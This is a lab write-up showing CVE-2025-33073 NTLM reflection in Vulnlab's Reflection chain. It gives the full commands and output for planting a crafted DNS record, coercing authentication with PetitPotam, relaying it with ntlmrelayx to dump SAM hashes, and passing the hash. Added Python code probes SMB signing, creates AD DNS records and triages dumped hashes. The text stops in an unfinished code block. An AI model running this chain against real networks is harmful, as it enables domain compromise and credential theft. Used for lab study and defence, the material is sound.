This post only demonstrates the attack itself. For a full walkthrough of the Reflection chain, I wrote one here: https://seriotonctf.github.io/Reflection-Vulnlab/
Synacktiv recently published a blog post on CVE-2025-33073 (NTLM reflection). In this post I show how to exploit it in Vulnlab's Reflection chain. For the in-depth analysis, refer to Synacktiv's original post.
Requirements
For this attack to succeed, the following must hold:
- SMB signing must not be enforced on the target. The coerced authentication is relayed back to the very host it came from over SMB; if that host requires signing, the relayed session cannot be signed and is rejected.
- The attacker must be able to create DNS records. In an AD-integrated zone any authenticated user can create new child records by default, so a low-privileged domain account such as abbie.smith below is enough.
- The target must not yet have the fix for CVE-2025-33073 (see the MSRC advisory in the resources).
Attack
First, check whether SMB signing is disabled on the targets:

```
➜ nxc smb targets.txt
SMB         10.10.163.39    445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.163.37    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.163.38    445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
Running nxc against 3 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
```

NetExec confirms that none of the three hosts enforce SMB signing (signing:False), so all of them are candidates for this attack. DC01 only reports signing:False because the lab turned it off: domain controllers require SMB signing by default, so in a real environment the DC is usually not relayable over SMB, while member servers and workstations usually are.
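A raw SMB2 NEGOTIATE probe, added here as an example (my own code, not part of the original post and not NetExec's): it reads the SecurityMode field of the server's NEGOTIATE response, which is the bit that `signing:False` summarises. `check_signing` opens a real TCP connection to port 445; `sample_response` is a constructed response for exercising the parser offline, not a capture.

```python
"""Probe an SMB server's signing policy by reading the SecurityMode field of
its SMB2 NEGOTIATE response. NetExec's signing:True/False comes from this field."""
import os
import socket
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SIGNING_ENABLED = 0x0001    # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002   # SMB2_NEGOTIATE_SIGNING_REQUIRED
# SMB 3.1.1 is left out on purpose: it needs negotiate contexts, and we only
# want the SecurityMode answer.
DIALECTS = (0x0202, 0x0210, 0x0300, 0x0302)
HEADER_FMT = "<HHIHHIIQIIQ16s"  # SMB2 header fields after the 4-byte ProtocolId


def smb2_header(command: int, flags: int = 0) -> bytes:
    """64-byte synchronous SMB2 header; everything except command/flags is zero or default."""
    return SMB2_MAGIC + struct.pack(HEADER_FMT, 64, 0, 0, command, 1, flags, 0, 0, 0, 0, 0, b"\x00" * 16)


def build_negotiate_request() -> bytes:
    """NetBIOS session header + SMB2 NEGOTIATE request advertising signing as enabled (not required)."""
    body = struct.pack("<HHHHI16sQ", 36, len(DIALECTS), SIGNING_ENABLED, 0, 0, os.urandom(16), 0)
    body += struct.pack("<%dH" % len(DIALECTS), *DIALECTS)
    msg = smb2_header(SMB2_NEGOTIATE) + body
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


def parse_negotiate_response(raw: bytes) -> dict:
    """Extract dialect and signing bits from an SMB2 NEGOTIATE response (NetBIOS header stripped)."""
    if len(raw) < 70 or raw[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message (SMB1-only server or garbage)")
    status, command = struct.unpack_from("<IH", raw, 8)   # Status at offset 8, Command at 12
    if command != SMB2_NEGOTIATE:
        raise ValueError("unexpected command %#x" % command)
    if status != 0:
        raise ValueError("NEGOTIATE failed, NTSTATUS %#010x" % status)
    _size, security_mode, dialect = struct.unpack_from("<HHH", raw, 64)  # body starts after the header
    return {
        "dialect": dialect,
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed by peer")
        buf += chunk
    return buf


def check_signing(host: str, port: int = 445, timeout: float = 5.0) -> dict:
    """Live probe: one TCP connection, one NEGOTIATE, parse the answer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_negotiate_request())
        length = int.from_bytes(_recv_exact(sock, 4)[1:], "big")   # NetBIOS: 1 type byte + 3 length bytes
        return parse_negotiate_response(_recv_exact(sock, length))


def sample_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    """Constructed NEGOTIATE response (not a capture) so the parser can be exercised offline."""
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\x00" * 16,
                       0, 8388608, 8388608, 8388608, 0, 0, 128, 0, 0)
    return smb2_header(SMB2_NEGOTIATE, flags=0x0001) + body   # flag 0x1 = SERVER_TO_REDIR


if __name__ == "__main__":
    import sys
    for host in sys.argv[1:]:
        try:
            r = check_signing(host)
            print("%s: dialect=%#06x signing_required=%s" % (host, r["dialect"], r["signing_required"]))
        except (OSError, ValueError) as exc:
            print("%s: %s" % (host, exc))
```

A host that answers with `signing_required=False` is what NetExec prints as `signing:False`; `signing_enabled` alone does not protect against relay, only the required bit does.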
Registering the DNS record
We need to register a new DNS record, here localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA, pointing to our IP address. The suffix after localhost is a marshalled CREDENTIAL_TARGET_INFORMATION blob; Synacktiv's article explains how a target name carrying it makes the victim's LSASS treat the reflected authentication as a local one. For the attack we only need the string.

```
➜ dnstool.py -u 'reflection.vl\abbie.smith' -p '<REDACTED>' 10.10.163.37 -a add -d 10.8.0.210 -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
```

Alternatively, the record can carry the hostname of the machine we want to exploit, e.g. DC01, in front of the same blob:

```
➜ dnstool.py -u 'reflection.vl\abbie.smith' -p '<REDACTED>' 10.10.163.37 -a add -d 10.8.0.210 -r 'DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
```

Let's verify that the record was created and points to the attacker's IP address:

```
➜ dnstool.py -u 'reflection.vl\abbie.smith' -p '<REDACTED>' 10.10.163.37 -a query -d 10.8.0.210 -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found record localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
DC=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA,DC=reflection.vl,CN=MicrosoftDNS,DC=DomainDnsZones,DC=reflection,DC=vl
[+] Record entry:
 - Type: 1 (A) (Serial: 90)
 - Address: 10.8.0.210
```

Or with dig:

```
➜ dig localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl

; <<>> DiG 9.18.30-0ubuntu0.24.04.2-Ubuntu <<>> localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20625
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. IN A

;; ANSWER SECTION:
localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. 180 IN A 10.8.0.210

;; Query time: 63 msec
;; SERVER: 10.10.163.37#53(DC01.reflection.vl) (UDP)
;; WHEN: Sun Jun 15 15:28:07 CET 2025
;; MSG SIZE  rcvd: 112
```

```
➜ dig DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl

; <<>> DiG 9.18.30-0ubuntu0.24.04.2-Ubuntu <<>> DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl @DC01.reflection.vl
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13727
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. IN A

;; ANSWER SECTION:
DC011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.reflection.vl. 180 IN A 10.8.0.210

;; Query time: 62 msec
;; SERVER: 10.10.163.37#53(DC01.reflection.vl) (UDP)
;; WHEN: Sun Jun 15 15:34:06 CET 2025
;; MSG SIZE  rcvd: 156
```
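An added example of what dnstool.py does under the hood (my own code, not dnstool's): it builds the `dnsRecord` value (MS-DNSP DNS_RPC_RECORD) for an A record and adds a `dnsNode` object under the zone in DomainDnsZones over LDAP. The DN layout is the one shown in the query output above. The `serial` default, the LDAPS port and the ldap3 connection details are assumptions (dnstool.py reads the zone's SOA serial and uses serial + 1; the DNS server does not validate the value when the record is written through LDAP).

```python
"""Create an AD-integrated DNS A record the way dnstool.py does: build the
dnsRecord attribute value (MS-DNSP DNS_RPC_RECORD) and add a dnsNode over LDAP."""
import socket
import struct
from typing import Tuple

DNS_TYPE_A = 0x0001
RANK_ZONE = 0xF0           # authoritative record stored in the zone
RECORD_HEADER = "<HHBBHL"  # DataLength, Type, Version, Rank, Flags, Serial
# Name used on this page: "localhost" + marshalled CREDENTIAL_TARGET_INFORMATION blob.
TARGET_NAME = "localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"


def build_a_record(ip: str, ttl: int = 180, serial: int = 1) -> bytes:
    """DNS_RPC_RECORD for an A record. TtlSeconds is big-endian, everything else little-endian."""
    data = socket.inet_aton(ip)                          # DNS_RPC_RECORD_A: raw IPv4 address
    header = struct.pack(RECORD_HEADER, len(data), DNS_TYPE_A, 5, RANK_ZONE, 0, serial)
    header += struct.pack(">L", ttl)                     # TtlSeconds (network byte order)
    header += struct.pack("<LL", 0, 0)                   # Reserved, TimeStamp (0 = static record)
    return header + data


def parse_record(blob: bytes) -> dict:
    """Inverse of build_a_record, handy for inspecting records read back from LDAP."""
    data_len, rtype, version, rank, flags, serial = struct.unpack_from(RECORD_HEADER, blob, 0)
    ttl = struct.unpack_from(">L", blob, 12)[0]
    data = blob[24:24 + data_len]
    rec = {"type": rtype, "version": version, "rank": rank, "flags": flags,
           "serial": serial, "ttl": ttl}
    if rtype == DNS_TYPE_A and data_len == 4:
        rec["address"] = socket.inet_ntoa(data)
    return rec


def record_dn(name: str, zone: str, domain_dn: str) -> str:
    """DN of the dnsNode: DC=<name>,DC=<zone>,CN=MicrosoftDNS,DC=DomainDnsZones,<domain DN>."""
    return "DC=%s,DC=%s,CN=MicrosoftDNS,DC=DomainDnsZones,%s" % (name, zone, domain_dn)


def add_record(dc: str, user: str, password: str, name: str, zone: str, domain_dn: str,
               ip: str, serial: int = 1, use_ssl: bool = True) -> Tuple[bool, dict]:
    """Add the record with ldap3 (imported lazily so the builders work without it).
    user is DOMAIN\\sam for NTLM, e.g. 'reflection.vl\\abbie.smith'."""
    from ldap3 import NTLM, Connection, Server   # assumption: ldap3 is installed
    server = Server(dc, port=636 if use_ssl else 389, use_ssl=use_ssl)
    conn = Connection(server, user=user, password=password, authentication=NTLM, auto_bind=True)
    ok = conn.add(record_dn(name, zone, domain_dn), ["top", "dnsNode"],
                  {"dnsRecord": [build_a_record(ip, serial=serial)], "dNSTombstoned": False})
    result = dict(conn.result)
    conn.unbind()
    return ok, result


if __name__ == "__main__":
    import getpass
    import sys
    # usage: adidns_add.py DC01.reflection.vl 'reflection.vl\abbie.smith' 10.8.0.210
    dc, user, ip = sys.argv[1:4]
    ok, result = add_record(dc, user, getpass.getpass("password: "), TARGET_NAME,
                            "reflection.vl", "DC=reflection,DC=vl", ip)
    print("added" if ok else "failed: %s" % result.get("description"))
```

The record becomes resolvable once the DNS server picks the new object up from the directory, which is why the walkthrough verifies with a query before coercing.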
Coercion
Now we only need to coerce the target into authenticating to the DNS name created above. PetitPotam, authenticated as abbie.smith, binds the MS-EFSRPC interface over the lsarpc pipe and asks the target to process a file under \\localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA\...; the EFS service (running as SYSTEM and authenticating over the network as the machine account) opens that UNC path, and that is the authentication we relay. ERROR_BAD_NETPATH is the expected outcome, since there is no real share behind our listener. ntlmrelayx (next section) has to be listening before the coercion is triggered.

```
➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA DC01.reflection.vl

              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:DC01.reflection.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```

We can also use NetExec's coerce_plus module:

```
➜ nxc smb DC01.reflection.vl -u abbie.smith -p '<REDACTED>' -M coerce_plus -o METHOD=Petitpotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
SMB         10.10.201.85    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.201.85    445    DC01             [+] reflection.vl\abbie.smith:<REDACTED>
COERCE_PLUS 10.10.201.85    445    DC01             VULNERABLE, PetitPotam
COERCE_PLUS 10.10.201.85    445    DC01             Exploit Success, lsarpc\EfsRpcAddUsersToFile
```
The attack works
As you can see, the attack worked: with ntlmrelayx targeting the same host that is being coerced, the reflected machine authentication is accepted with a SYSTEM token, so ntlmrelayx's default SMB action, dumping the local SAM through the remote registry, succeeds. Note the empty domain and user in the "Authenticating against ... as / SUCCEED" lines, and that ntlmrelayx starts (and afterwards stops) the RemoteRegistry service, which is noisy on a monitored host; other actions such as -c or -socks work just as well with this session.

```
➜ ntlmrelayx.py -t "smb://DC01.reflection.vl" -smb2support
Impacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.163.37, attacking target smb://DC01.reflection.vl
[*] Authenticating against smb://DC01.reflection.vl as / SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.10.163.37, attacking target smb://DC01.reflection.vl
[*] Service RemoteRegistry is in stopped state
[*] Authenticating against smb://DC01.reflection.vl as / SUCCEED
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xfcb176024780bc221b4c7b3f35e16dfd
[*] Target system bootKey: 0xfcb176024780bc221b4c7b3f35e16dfd
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Done dumping SAM hashes for host: dc01.reflection.vl
[*] Done dumping SAM hashes for host: dc01.reflection.vl
[*] Stopping service RemoteRegistry
```

With the Administrator hash we can pass-the-hash:

```
➜ nxc smb DC01.reflection.vl -u administrator -H <REDACTED>
SMB         10.10.163.37    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         10.10.163.37    445    DC01             [+] reflection.vl\administrator:<REDACTED> (Pwn3d!)
```
MS01 and WS01 can be targeted in the same way. Since the dumped hashes belong to their local SAM, pass them with --local-auth.

MS01

```
➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA ms01.reflection.vl

              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:ms01.reflection.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```

```
➜ ntlmrelayx.py -t "smb://MS01.reflection.vl" -smb2support
Impacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.163.38, attacking target smb://MS01.reflection.vl
[*] Authenticating against smb://MS01.reflection.vl as / SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.10.163.38, attacking target smb://MS01.reflection.vl
[*] Service RemoteRegistry is in stopped state
[*] Authenticating against smb://MS01.reflection.vl as / SUCCEED
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Target system bootKey: 0xf0093534e5f21601f5f509571855eeee
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Done dumping SAM hashes for host: ms01.reflection.vl
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Done dumping SAM hashes for host: ms01.reflection.vl
[*] Stopping service RemoteRegistry
```

```
➜ nxc smb MS01.reflection.vl -u administrator -H <REDACTED> --local-auth
SMB         10.10.163.38    445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB         10.10.163.38    445    MS01             [+] MS01\administrator:<REDACTED> (Pwn3d!)
```

WS01

```
➜ PetitPotam.py -d reflection.vl -u abbie.smith -p '<REDACTED>' localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA WS01.reflection.vl

              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN

Trying pipe lsarpc
[-] Connecting to ncacn_np:WS01.reflection.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!
```

```
➜ ntlmrelayx.py -t "smb://WS01.reflection.vl" -smb2support
Impacket v0.13.0.dev0+20250415.195618.c384b5fb - Copyright Fortra, LLC and its affiliated companies

[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.163.39, attacking target smb://WS01.reflection.vl
[*] Authenticating against smb://WS01.reflection.vl as / SUCCEED
[*] SMBD-Thread-7 (process_request_thread): Received connection from 10.10.163.39, attacking target smb://WS01.reflection.vl
[*] Service RemoteRegistry is in stopped state
[*] Authenticating against smb://WS01.reflection.vl as / SUCCEED
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Target system bootKey: 0x7ed33ac4a19a5ea7635d402e58c0055f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:236728438532f0f1a57360173bda0575:::
labadm:1001:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Done dumping SAM hashes for host: ws01.reflection.vl
labadm:1001:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Done dumping SAM hashes for host: ws01.reflection.vl
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry
```

```
➜ nxc smb WS01.reflection.vl -u administrator -H <REDACTED> --local-auth
SMB         10.10.163.39    445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:WS01) (signing:False) (SMBv1:False)
SMB         10.10.163.39    445    WS01             [+] WS01\administrator:<REDACTED> (Pwn3d!)
```
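An added triage helper for the SAM dumps above (my own code, not impacket's): it parses secretsdump-style lines, collapses the duplicates produced by ntlmrelayx's two relay threads, flags accounts whose NT hash is the empty-password hash or that still store an LM hash, and computes NT hashes for candidate passwords with a pure-Python MD4 (OpenSSL 3 ships MD4 only in its legacy provider, so `hashlib.new("md4")` is often unavailable). The sample dump is the MS01 output from this page without the redacted Administrator line; the candidate passwords are made up.

```python
"""Triage a secretsdump-style SAM dump (user:rid:lmhash:nthash:::) and compute NT
hashes for candidate passwords with a pure-Python MD4 (OpenSSL 3 keeps MD4 in its
legacy provider, so hashlib.new("md4") is often unavailable)."""
import struct
from typing import Iterable, List, Optional

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample: the MS01 lines from this page (redacted Administrator line
# omitted), including the duplicates ntlmrelayx printed from its two relay threads.
SAMPLE_DUMP = """\
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:bb5d8648678f590b8b3051e24a985345:::
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
[*] Done dumping SAM hashes for host: ms01.reflection.vl
labadm:1000:aad3b435b51404eeaad3b435b51404ee:2a50f9a04b270a24fcd474092ebd9c8e:::
"""


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, enough for NT hashes."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    bit_len = len(data) * 8
    # pad to 56 mod 64 and append the little-endian bit length
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                   # round 1
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & mask, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & mask, (b0 + b) & mask, (c0 + c) & mask, (d0 + d) & mask
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as stored in the SAM and passed with nxc -H."""
    return md4(password.encode("utf-16le")).hex()


def parse_dump(text: str) -> List[dict]:
    """Parse dump lines, drop duplicates, and flag the weak cases a reviewer looks for."""
    seen, rows = set(), []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue                      # status lines such as "[*] Done dumping ..."
        key = tuple(parts[:4])
        if key in seen:
            continue
        seen.add(key)
        lm, nt = parts[2].lower(), parts[3].lower()
        rows.append({
            "user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt,
            "redacted": len(nt) != 32,                       # e.g. "<REDACTED>" on this page
            "empty_password": nt == EMPTY_NT,
            "lm_stored": len(lm) == 32 and lm != EMPTY_LM,   # real LM hash present: trivially crackable
        })
    return rows


def check_candidates(nt: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate password whose NT hash matches, else None."""
    nt = nt.lower()
    for candidate in candidates:
        if nt_hash(candidate) == nt:
            return candidate
    return None


if __name__ == "__main__":
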